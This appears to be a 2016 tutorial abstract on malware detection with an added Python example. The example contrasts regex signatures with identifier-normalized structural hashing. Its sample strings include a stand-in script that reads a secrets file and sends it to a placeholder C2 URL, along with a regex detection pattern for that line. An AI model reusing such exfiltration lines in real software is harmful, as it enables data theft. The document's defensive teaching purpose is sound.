Malware Detection

A tutorial on malware detection presented at the 12th International Summer School on Software Engineering, June 13-16, 2016, University of Salerno, Italy.

Malware is software that is designed to cause harm by, for example, gaining access to private computer systems, stealing sensitive information, infecting files on the system, or spreading its infection. To avoid such malicious activity, malware must be detected and removed from a computer system. The volume of malware is constantly growing at an impressive pace: the AV-Test institute registers 390,000 new malware samples every day, and in 2014 alone 140 million new malicious programs were found.

Not only personal computers, but also mobile devices are targeted by malware. With their increasing power, these devices now represent a widely used way to access the web and cloud resources. The growth rate of new mobile malware is far greater than the growth rate of new malware targeting PCs. Malware is evolving both in its methods of infection and in its evasion techniques. Social engineering is heavily used to distribute malicious links or files that contain Trojans or malware installers. Mobile apps are also exploited to spread malware by three main methods: repackaging, attack upgrade, and drive-by downloads.

Current antimalware products are mostly signature-based: this approach requires that the vendor be aware of the malware in order to extract its signature and send out updates regularly. Signatures have traditionally taken the form of fixed strings and regular expressions. With signature-based detection, a threat must already be widespread before it can be recognized. In addition, several techniques allow malware to evade signature detection; trivial changes to the code are usually enough, e.g., renaming variables in the malware code, as demonstrated in the literature.
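The following is an added illustration of the point above and is not code from the tutorial: it contrasts a fixed-string/regex signature with a signature computed over an identifier-normalized token stream, and shows that renaming a variable defeats the former but not the latter. The two script snippets, the signature pattern, and the helper names (`matches_literal_signature`, `normalize_identifiers`, `structural_signature`) are all constructed for this example; the "malicious" sample is a harmless stand-in that only calls undefined placeholder functions.

```python
import hashlib
import io
import keyword
import re
import tokenize

# Constructed stand-in for a malicious script (harmless: the functions it
# calls are never defined or executed; the snippet is only tokenized).
ORIGINAL = '''
stolen_data = read_file("/home/user/secrets.txt")
send_to_server(stolen_data, "http://c2.example.invalid/upload")
'''

# The same program after the trivial change the text mentions: one
# variable renamed.  Behaviour is identical, bytes are not.
RENAMED = '''
a1 = read_file("/home/user/secrets.txt")
send_to_server(a1, "http://c2.example.invalid/upload")
'''

# An unrelated, benign snippet used to check the structural signature
# does not match everything.
UNRELATED = '''
total = 0
for n in range(10):
    total = total + n
'''

# A traditional signature: a regular expression over the raw source text.
LITERAL_SIGNATURE = re.compile(r"stolen_data\s*=\s*read_file")


def matches_literal_signature(source: str) -> bool:
    """Classic fixed-string / regex matching on the raw bytes."""
    return LITERAL_SIGNATURE.search(source) is not None


# Token types that carry layout only and are irrelevant to program structure.
_SKIP = {
    tokenize.NEWLINE, tokenize.NL, tokenize.INDENT, tokenize.DEDENT,
    tokenize.COMMENT, tokenize.ENDMARKER,
}


def normalize_identifiers(source: str) -> str:
    """Return a canonical token string in which every user-chosen identifier
    is replaced by a positional placeholder (ID0, ID1, ...).

    Names immediately followed by "(" are treated as API/function calls and
    kept verbatim: an author can rename a local variable freely, but cannot
    rename the library function the program depends on without changing
    behaviour.  This is a deliberate, simplifying assumption for the example.
    """
    toks = [t for t in tokenize.generate_tokens(io.StringIO(source).readline)
            if t.type not in _SKIP]
    placeholders = {}
    out = []
    for i, tok in enumerate(toks):
        nxt = toks[i + 1].string if i + 1 < len(toks) else ""
        if (tok.type == tokenize.NAME
                and not keyword.iskeyword(tok.string)
                and nxt != "("):
            out.append(placeholders.setdefault(tok.string, f"ID{len(placeholders)}"))
        else:
            out.append(tok.string)
    return " ".join(out)


def structural_signature(source: str) -> str:
    """Hash of the normalized token stream: stable under variable renaming."""
    return hashlib.sha256(normalize_identifiers(source).encode()).hexdigest()


if __name__ == "__main__":
    for label, sample in (("original", ORIGINAL), ("renamed", RENAMED),
                          ("unrelated", UNRELATED)):
        print(f"{label:10s} literal={matches_literal_signature(sample)!s:5s} "
              f"structural={structural_signature(sample)[:16]}")
```

The literal signature fires on the original sample and is silent on the renamed one, while the two share one structural signature and the unrelated snippet does not. Normalizing identifiers closes only the renaming gap: reordering statements, inserting junk code, or aliasing the called functions changes the token stream again, which is why detection research moves from byte patterns toward behavioural and semantic features.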

In this tutorial we will illustrate different types of malware in terms of their mechanisms of infection, the kinds of payload they use, and the evasion techniques they adopt. We will discuss the limitations of current antimalware solutions, and the pros and cons of the cutting-edge antimalware techniques that are emerging in the research literature. We will offer an appraisal of how to close the gap between antimalware technology and malware technology, not only in terms of software tools, but also in terms of culture and knowledge.